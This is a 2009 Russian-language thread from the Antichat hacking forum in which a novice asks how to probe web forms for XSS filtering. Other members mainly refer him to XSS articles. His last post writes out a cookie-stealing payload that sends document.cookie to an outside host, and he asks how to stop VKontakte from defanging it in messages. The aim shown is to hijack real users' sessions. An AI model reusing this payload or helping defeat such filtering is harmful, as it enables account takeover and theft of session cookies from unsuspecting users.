ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Перезагрузить страницу фильтор
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

фильтор
  #1  
Старый 30.03.2009, 03:36
Plaf-di
Новичок
Регистрация: 23.03.2009
Сообщений: 10
Провел на форуме:
95007

Репутация: -9
По умолчанию фильтор
извеняюсь если гдето это было я не нашёл...

я прочитал:
### А как определить есть фильтр или нет?

Просто в любое поле вводим: '';!--"<fuck>=&{()}
Дальше открываем html страничку и ищем слово "fuck"
и смотри ...........

фильтрации вот так: "><>'"`,/\?@%
и у меня вопрос....
куда писать ';!--"<fuck>=&{()}
да и вобще немоглибы по подробнее расказать про это?

и ещё раз извеняюсь...
 
Ответить с цитированием

  #2  
Старый 30.03.2009, 05:34
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию
В тектовые поля.Поподробнеетолько статьи об XSS тебе раскажут.Разжовано все не один раз с 2005 года,просто поищи.
 
Ответить с цитированием

  #3  
Старый 30.03.2009, 05:52
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию
В статье Микроба всё подробно описано, если мне память не изменяет это как раз из неё пример, почитай ещё статьи про XSS, понимание придёт со временем...
 
Ответить с цитированием

  #4  
Старый 30.03.2009, 18:45
Plaf-di
Новичок
Регистрация: 23.03.2009
Сообщений: 10
Провел на форуме:
95007

Репутация: -9
По умолчанию
m0Hze
тоесть надо в любое место где можно в вести текст...
а не в адресную строку.

и ещё незнаете как сделать чтобы
...javascript:document.write('<script>img = new Image(); img.src = "http://mp4forum.ru/n1077.gif?"+document.cookie;</script>')...
после того как отпровляешь вконтакте сообщении не стоновилось
...javas?1?ript:document.write('<script>img = new Image(); img.src = "http://mp4forum.ru/n1077.gif?"+document.?4??4??1?ki?1?;</script>')...
Последний раз редактировалось Plaf-di; 30.03.2009 в 18:49..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ